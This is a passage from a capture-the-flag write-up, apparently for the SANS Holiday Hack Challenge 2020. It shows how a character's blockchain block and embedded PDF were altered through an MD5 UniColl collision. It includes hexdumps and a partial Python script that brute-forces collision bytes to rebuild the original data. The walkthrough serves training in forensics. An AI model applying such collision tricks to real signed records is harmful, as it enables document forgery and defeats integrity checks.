&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocks&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1010&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dump_doc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;Document dumped as: 129459.pdf&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can download the file &lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/129459.pdf"&gt;here&lt;/a&gt;.
Here's the content:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“Jack Frost is the kindest, bravest, warmest, most wonderful being I’ve
ever known in my life.”&lt;/p&gt;
&lt;p&gt;– Mother Nature&lt;/p&gt;
&lt;p&gt;“Jack Frost is the bravest, kindest, most wonderful, warmest being I’ve
ever known in my life.”&lt;/p&gt;
&lt;p&gt;– The Tooth Fairy&lt;/p&gt;
&lt;p&gt;“Jack Frost is the warmest, most wonderful, bravest, kindest being I’ve
ever known in my life.”&lt;/p&gt;
&lt;p&gt;– Rudolph of the Red Nose&lt;/p&gt;
&lt;p&gt;“Jack Frost is the most wonderful, warmest, kindest, bravest being I’ve
ever known in my life.”&lt;/p&gt;
&lt;p&gt;– The Abominable Snowman&lt;/p&gt;
&lt;p&gt;With acclaim like this, coming from folks who really know goodness when
they see it, Jack Frost should undoubtedly be awarded a huge number of
Naughty/Nice points.&lt;/p&gt;
&lt;p&gt;Shinny Upatree&lt;/p&gt;
&lt;p&gt;3/24/2020&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Hmm, something seems fishy... Let's examine this PDF a little more closely
with &lt;code&gt;pdfid&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; pdfid ./129459.pdf
&lt;span class="go"&gt;PDFiD 0.2.7 ./129459.pdf&lt;/span&gt;
&lt;span class="go"&gt; PDF Header: %PDF-1.3&lt;/span&gt;
&lt;span class="go"&gt; obj                   23&lt;/span&gt;
&lt;span class="go"&gt; endobj                23&lt;/span&gt;
&lt;span class="go"&gt; stream                 8&lt;/span&gt;
&lt;span class="go"&gt; endstream              8&lt;/span&gt;
&lt;span class="go"&gt; xref                   1&lt;/span&gt;
&lt;span class="go"&gt; trailer                1&lt;/span&gt;
&lt;span class="go"&gt; startxref              1&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt; /Page                  2&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt; /Encrypt               0&lt;/span&gt;
&lt;span class="go"&gt; /ObjStm                0&lt;/span&gt;
&lt;span class="go"&gt; /JS                    0&lt;/span&gt;
&lt;span class="go"&gt; /JavaScript            0&lt;/span&gt;
&lt;span class="go"&gt; /AA                    0&lt;/span&gt;
&lt;span class="go"&gt; /OpenAction            0&lt;/span&gt;
&lt;span class="go"&gt; /AcroForm              0&lt;/span&gt;
&lt;span class="go"&gt; /JBIG2Decode           0&lt;/span&gt;
&lt;span class="go"&gt; /RichMedia             0&lt;/span&gt;
&lt;span class="go"&gt; /Launch                0&lt;/span&gt;
&lt;span class="go"&gt; /EmbeddedFile          0&lt;/span&gt;
&lt;span class="go"&gt; /XFA                   0&lt;/span&gt;
&lt;span class="go"&gt; /Colors &amp;gt; 2^24         0&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;What, two &lt;code&gt;/Page&lt;/code&gt; objects? But there's only one page in the PDF.
Something doesn't add up, let's examine it even more closely, with &lt;a class="reference external" href="http://sandsprite.com/blogs/index.php?uid=7&amp;amp;pid=57"&gt;PDF Stream
Dumper&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;NB: to understand how to navigate inside a PDF file, I used&lt;/em&gt; &lt;a class="reference external" href="https://resources.infosecinstitute.com/topic/pdf-file-format-basic-structure/"&gt;this thorough
article from Infosec Institude&lt;/a&gt;,
&lt;em&gt;as well as&lt;/em&gt; &lt;a class="reference external" href="https://raw.githubusercontent.com/corkami/pics/master/binary/PDF.png"&gt;this simple image&lt;/a&gt;
&lt;em&gt;from Ange Albertini, aka &amp;#64;corkami, our national treasure.&lt;/em&gt;&lt;/p&gt;
&lt;img alt="129459.pdf_trailer.png" class="align-center" src="/images/sans-christmas-challenge-2020/129459.pdf_trailer.png" /&gt;
&lt;p&gt;The trailer is referencing object #1 as the root of the PDF document. Let's
check it:&lt;/p&gt;
&lt;img alt="129459.pdf_object_1.png" class="align-center" src="/images/sans-christmas-challenge-2020/129459.pdf_object_1.png" /&gt;
&lt;p&gt;It's an object of type &lt;code&gt;/Catalog&lt;/code&gt;, pointing to object #2 as pages. But
something's off with this object. First, there's the &lt;code&gt;_Go_Away/Santa&lt;/code&gt;
text, and the binary blob at the end.&lt;/p&gt;
&lt;p&gt;Anyway, let's take a look at object #2:&lt;/p&gt;
&lt;img alt="129459.pdf_object_2.png" class="align-center" src="/images/sans-christmas-challenge-2020/129459.pdf_object_2.png" /&gt;
&lt;p&gt;It's indeed a &lt;code&gt;/Pages&lt;/code&gt; object, pointing to object #23 for the
&lt;code&gt;/Page&lt;/code&gt;. But if we keep exploring &lt;code&gt;129459.pdf&lt;/code&gt;, we find this under
object #3:&lt;/p&gt;
&lt;img alt="129459.pdf_object_3.png" class="align-center" src="/images/sans-christmas-challenge-2020/129459.pdf_object_3.png" /&gt;
&lt;p&gt;&lt;em&gt;Another&lt;/em&gt; &lt;code&gt;/Pages&lt;/code&gt; object, pointing to &lt;em&gt;another&lt;/em&gt; &lt;code&gt;/Page&lt;/code&gt; object.
As &lt;code&gt;pdfid&lt;/code&gt; pointed out, there seems to be two pages in this PDF file,
but the catalog points to only one of them. What would happend if we modified
the &lt;code&gt;/Catalog&lt;/code&gt; (object #1) so that it pointed to object #3 instead of
object #2? We can edit &lt;code&gt;129459.pdf&lt;/code&gt; with a binary editor to modify the
&amp;quot;2&amp;quot; to a &amp;quot;3&amp;quot;. &lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/129459_modified_catalog.pdf"&gt;Here&lt;/a&gt;'s
the file that we get:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Earlier today, I saw this bloke Jack Frost climb into one of our cages and
repeatedly kick a wombat. I don’t know what’s with him... it’s like he’s a
few stubbies short of a six-pack or somethin’. I don’t think the wombat was
actually hurt... but I tell ya, it was more ‘n a bit shook up. Then the
bloke climbs outtathe cage all laughin’ and cacklin’ like it was some kind
of bonza joke. Never in my life have I seen someone who was that bloody
evil...”&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Quote from a Sidney (Australia) Zookeeper&lt;/p&gt;
&lt;p&gt;I have reviewed a surveillance video tape showing the incident and found
that it does, indeed, show that Jack Frost deliberately traveled to
Australia just to attack this cute, helpless animal.  It was appalling.&lt;/p&gt;
&lt;p&gt;I tracked Frost down and found him in Nepal. I confronted him with the
evidence and, surprisingly, he seems to actually be incredibly contrite.
He even says that he’ll give me access to a digital photo that shows his
“utterly regrettable” actions. Even more remarkably, he’s allowing me to
use his laptop to generate this report – because for some reason, my laptop
won’t connect to the WiFi here.&lt;/p&gt;
&lt;p&gt;He says that he’s sorry and needs to be “held accountable for his actions.”
He’s even said that &lt;strong&gt;I should give him the biggest Naughty/Nice penalty&lt;/strong&gt;
possible. I suppose he believes that by cooperating with me,that I’ll
somehow feel obliged to go easier on him. That’s not going to happen...
I’m WAAAAY smarter than old Jack.&lt;/p&gt;
&lt;p&gt;Oh man... while I was writing this up, I received a call from my wife
telling me that one of the pipes inour house back in the North Pole has
frozen and water is leaking everywhere. How could that have happened?&lt;/p&gt;
&lt;p&gt;Jack is telling me that I should hurry back home. He says I should save
this document and then he’ll go ahead and submit the full report for me.
I’m not completely sure I trust him, but I’ll make myself a note and go in
and check to make absolutely sure he submits this properly.&lt;/p&gt;
&lt;p&gt;Shinny Upatree&lt;/p&gt;
&lt;p&gt;3/24/2020&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;em&gt;Gasp!&lt;/em&gt; It looks like Jack Frost managed to modify the PDF sent by Shinny
Upatree, as well as his naughty/nice sign! But how could he do that, when
the blocks are signed? Well, remember that the hash function used to compute
the signature is MD5, which is extremely insecure, since many collision
attacks were found against it.&lt;/p&gt;
&lt;p&gt;You can find more information on collision attacks on &lt;a class="reference external" href="https://github.com/corkami/collisions"&gt;Ange Albertini's
collisions repository on GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let's take a look at the beginning of Jack Frost's block:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; hexdump -C ./blocks/block_1010 &lt;span class="p"&gt;|&lt;/span&gt; head -n &lt;span class="m"&gt;15&lt;/span&gt;
&lt;span class="go"&gt;00000000  30 30 30 30 30 30 30 30  30 30 30 31 66 39 62 33  |000000000001f9b3|&lt;/span&gt;
&lt;span class="go"&gt;00000010  61 39 34 34 37 65 35 37  37 31 63 37 30 34 66 34  |a9447e5771c704f4|&lt;/span&gt;
&lt;span class="go"&gt;00000020  30 30 30 30 30 30 30 30  30 30 30 31 32 66 64 31  |0000000000012fd1|&lt;/span&gt;
&lt;span class="go"&gt;00000030  30 30 30 30 30 30 30 30  30 30 30 30 30 32 30 66  |000000000000020f|&lt;/span&gt;
&lt;span class="go"&gt;00000040  32 66 66 66 66 66 66 66  66 31 66 66 30 30 30 30  |2ffffffff1ff0000|&lt;/span&gt;
&lt;span class="go"&gt;00000050  30 30 36 63 ea 46 53 40  30 3a 60 79 d3 df 27 62  |006c.FS@0:`y..&amp;#39;b|&lt;/span&gt;
&lt;span class="go"&gt;00000060  be 68 46 7c 27 f0 46 d3  a7 ff 4e 92 df e1 de f7  |.hF|&amp;#39;.F...N.....|&lt;/span&gt;
&lt;span class="go"&gt;00000070  40 7f 2a 7b 73 e1 b7 59  b8 b9 19 45 1e 37 51 8d  |@.*{s..Y...E.7Q.|&lt;/span&gt;
&lt;span class="go"&gt;00000080  22 d9 87 29 6f cb 0f 18  8d d6 03 88 bf 20 35 0f  |&amp;quot;..)o........ 5.|&lt;/span&gt;
&lt;span class="go"&gt;00000090  2a 91 c2 9d 03 48 61 4d  c0 bc ee f2 bc ad d4 cc  |*....HaM........|&lt;/span&gt;
&lt;span class="go"&gt;000000a0  3f 25 1b a8 f9 fb af 17  1a 06 df 1e 1f d8 64 93  |?%............d.|&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;000000b0  96 ab 86 f9 d5 11 8c c8  d8 20 4b 4f fe 8d 8f 09  |......... KO....|&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;000000c0  30 35 30 30 30 30 39 66  35 37 25 50 44 46 2d 31  |0500009f57%PDF-1|&lt;/span&gt;
&lt;span class="go"&gt;000000d0  2e 33 0a 25 25 c1 ce c7  c5 21 0a 0a 31 20 30 20  |.3.%%....!..1 0 |&lt;/span&gt;
&lt;span class="go"&gt;000000e0  6f 62 6a 0a 3c 3c 2f 54  79 70 65 2f 43 61 74 61  |obj.&amp;lt;&amp;lt;/Type/Cata|&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that the blob file aligns exactly to a multiple of 16 bytes. We can
see that this is also the case with the weird binary we saw in the PDF's object
#1:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; hexdump -C ./129459.pdf &lt;span class="p"&gt;|&lt;/span&gt; head -n &lt;span class="m"&gt;15&lt;/span&gt;
&lt;span class="go"&gt;00000000  25 50 44 46 2d 31 2e 33  0a 25 25 c1 ce c7 c5 21  |%PDF-1.3.%%....!|&lt;/span&gt;
&lt;span class="go"&gt;00000010  0a 0a 31 20 30 20 6f 62  6a 0a 3c 3c 2f 54 79 70  |..1 0 obj.&amp;lt;&amp;lt;/Typ|&lt;/span&gt;
&lt;span class="go"&gt;00000020  65 2f 43 61 74 61 6c 6f  67 2f 5f 47 6f 5f 41 77  |e/Catalog/_Go_Aw|&lt;/span&gt;
&lt;span class="go"&gt;00000030  61 79 2f 53 61 6e 74 61  2f 50 61 67 65 73 20 32  |ay/Santa/Pages 2|&lt;/span&gt;
&lt;span class="go"&gt;00000040  20 30 20 52 20 20 20 20  20 20 30 f9 d9 bf 57 8e  | 0 R      0...W.|&lt;/span&gt;
&lt;span class="go"&gt;00000050  3c aa e5 0d 78 8f e7 60  f3 1d 64 af aa 1e a1 f2  |&amp;lt;...x..`..d.....|&lt;/span&gt;
&lt;span class="go"&gt;00000060  a1 3d 63 75 3e 1a a5 bf  80 62 4f c3 46 bf d6 67  |.=cu&amp;gt;....bO.F..g|&lt;/span&gt;
&lt;span class="go"&gt;00000070  ca f7 49 95 91 c4 02 01  ed ab 03 b9 ef 95 99 1c  |..I.............|&lt;/span&gt;
&lt;span class="go"&gt;00000080  5b 49 9f 86 dc 85 39 85  90 99 ad 54 b0 1e 73 3f  |[I....9....T..s?|&lt;/span&gt;
&lt;span class="go"&gt;00000090  e5 a7 a4 89 b9 32 95 ff  54 68 03 4d 49 79 38 e8  |.....2..Th.MIy8.|&lt;/span&gt;
&lt;span class="go"&gt;000000a0  f9 b8 cb 3a c3 cf 50 f0  1b 32 5b 9b 17 74 75 95  |...:..P..2[..tu.|&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;000000b0  42 2b 73 78 f0 25 02 e1  a9 b0 ac 85 28 01 7a 9e  |B+sx.%......(.z.|&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;000000c0  0a 3e 3e 0a 65 6e 64 6f  62 6a 0a 0a 32 20 30 20  |.&amp;gt;&amp;gt;.endobj..2 0 |&lt;/span&gt;
&lt;span class="go"&gt;000000d0  6f 62 6a 0a 3c 3c 2f 54  79 70 65 2f 50 61 67 65  |obj.&amp;lt;&amp;lt;/Type/Page|&lt;/span&gt;
&lt;span class="go"&gt;000000e0  73 2f 43 6f 75 6e 74 20  31 2f 4b 69 64 73 5b 32  |s/Count 1/Kids[2|&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Seems like the usage of the &lt;a class="reference external" href="https://github.com/corkami/collisions#unicoll-md5"&gt;UniColl&lt;/a&gt;
attack against MD5. As detailed by Ange Albertini, it can be used to create a
&lt;a class="reference external" href="https://github.com/corkami/collisions#pdf"&gt;collision between two PDF files&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;But wait, to implement these attacks, you would need to know the prefix of the
file beforehand, and there's a random nonce at the beginning of each block,
specifically to prevent such attacks. Well, as we saw in the &lt;a class="reference external" href="#naughty-nice-list-with-blockchain-investigation-part-1"&gt;previous
section&lt;/a&gt;, we can
predict future nonces.&lt;/p&gt;
&lt;p&gt;Everything points to an MD5 collision:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Jack Frost modified his naughty/nice sign from &amp;quot;0&amp;quot; (&lt;code&gt;0x30&lt;/code&gt;) to &amp;quot;1&amp;quot;
(&lt;code&gt;0x31&lt;/code&gt;) at offset &lt;code&gt;0x49&lt;/code&gt; in his block&lt;/li&gt;
&lt;li&gt;He then added an MD5 collision block as a binary blob, which lies between
&lt;code&gt;0x54&lt;/code&gt; and &lt;code&gt;0xc0&lt;/code&gt; in the block&lt;/li&gt;
&lt;li&gt;He also modified the PDF so that the catalog from pointing to &amp;quot;3&amp;quot;
(&lt;code&gt;0x33&lt;/code&gt;) to pointing to &amp;quot;2&amp;quot; (&lt;code&gt;0x32&lt;/code&gt;), at offset &lt;code&gt;0x109&lt;/code&gt; in
his block&lt;/li&gt;
&lt;li&gt;He then added an MD5 collision block at the end of the catalog, which lies
between &lt;code&gt;0x10e&lt;/code&gt; and &lt;code&gt;0x18a&lt;/code&gt; in the block&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Knowing all of this, we can recreate Jack's original block by switching this
naughty/nice sign back to &lt;code&gt;0x30&lt;/code&gt;, the page in the catalog back to
&lt;code&gt;0x33&lt;/code&gt;, and modifying one byte in each collision block to get our MD5
collision.&lt;/p&gt;
&lt;p&gt;Here's our Python script to do so:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python3&lt;/span&gt;

&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;naughty_nice&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Chain&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;hashlib&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;md5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sha256&lt;/span&gt;

&lt;span class="n"&gt;OFFSET_SIGN&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mh"&gt;0x49&lt;/span&gt; &lt;span class="c1"&gt;# The offset to the naughty/nice sign&lt;/span&gt;
&lt;span class="n"&gt;FLIP_RANGE_SIGN&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x54&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mh"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="c1"&gt;# The range where we&amp;#39;ll try to flip the byte&lt;/span&gt;

&lt;span class="n"&gt;OFFSET_PAGE&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mh"&gt;0x109&lt;/span&gt; &lt;span class="c1"&gt;# The offset to the page pointer&lt;/span&gt;
&lt;span class="n"&gt;FLIP_RANGE_PAGE&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x10e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mh"&gt;0x18a&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="c1"&gt;# The range where we&amp;#39;ll try to flip the byte&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;find_byte_to_flip&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b_array&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;b_array_to_match&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;flip_range&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="c1"&gt;# This is the MD5 to match&lt;/span&gt;
    &lt;span class="n"&gt;target_md5&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;md5&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b_array_to_match&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hexdigest&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="c1"&gt;# We go through every byte in the flip range&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;flip_range&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# We save the initial byte value before doing our modifications&lt;/span&gt;
        &lt;span class="n"&gt;initial_byte&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;b_array&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

        &lt;span class="c1"&gt;# We try every byte value possible&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="n"&gt;b_array&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;
            &lt;span class="c1"&gt;# If we have an MD5 match, we return it&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;md5&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b_array&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hexdigest&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;target_md5&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;b_array&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;b_array_to_match&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Match found: offset {}, new_byte value 0x{:02x}&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
                &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# If we don&amp;#39;t have a match, we restore the initial value&lt;/span&gt;
        &lt;span class="n"&gt;b_array&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;initial_byte&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="c1"&gt;# We load the block chain, and more specifically Jack&amp;#39;s block&lt;/span&gt;
    &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Chain&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;load&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;blockchain.dat&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;jf_block&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocks&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1010&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="n"&gt;jf_block_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;jf_block&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;block_data&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="c1"&gt;# We create a copy of the altered data to recreate the original data&lt;/span&gt;
    &lt;span class="n"&gt;jf_orig_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;bytearray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;jf_block&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;block_data&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;

    &lt;span class="c1"&gt;# We modify the naughty/nice sign from &amp;quot;1&amp;quot; (0x31) to &amp;quot;0&amp;quot; (0x30)&lt;/span&gt;
    &lt;span class="n"&gt;jf_orig_data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;OFFSET_SIGN&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mh"&gt;0x30&lt;/span&gt;
    &lt;span class="n"&gt;sign_flip_offset&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sign_flip_value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;find_byte_to_flip&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;jf_orig_data&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="n"&gt;FLIP_RANGE_SIGN&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]],&lt;/span&gt;
            &lt;span class="n"&gt;jf_block_data&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="n"&gt;FLIP_RANGE_SIGN&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]],&lt;/span&gt;
            &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;FLIP_RANGE_SIGN&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="n"&gt;jf_orig_data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;sign_flip_offset&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sign_flip_value&lt;/span&gt;

    &lt;span class="c1"&gt;# We modify the page pointer in the PDF from &amp;quot;2&amp;quot; (0x32) to &amp;quot;3&amp;quot; (0x33)&lt;/span&gt;
    &lt;span class="n"&gt;jf_orig_data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;OFFSET_PAGE&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mh"&gt;0x33&lt;/span&gt;
    &lt;span class="n"&gt;page_flip_offset&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;page_flip_value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;find_byte_to_flip&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;jf_orig_data&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="n"&gt;FLIP_RANGE_PAGE&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]],&lt;/span&gt;
            &lt;span class="n"&gt;jf_block_data&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="n"&gt;FLIP_RANGE_PAGE&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]],&lt;/span&gt;
            &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;FLIP_RANGE_PAGE&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="n"&gt;jf_orig_data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;page_flip_offset&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;page_flip_value&lt;/span&gt;

    &lt;span class="c1"&gt;# We create the block from the data, the hash, and the signature&lt;/span&gt;
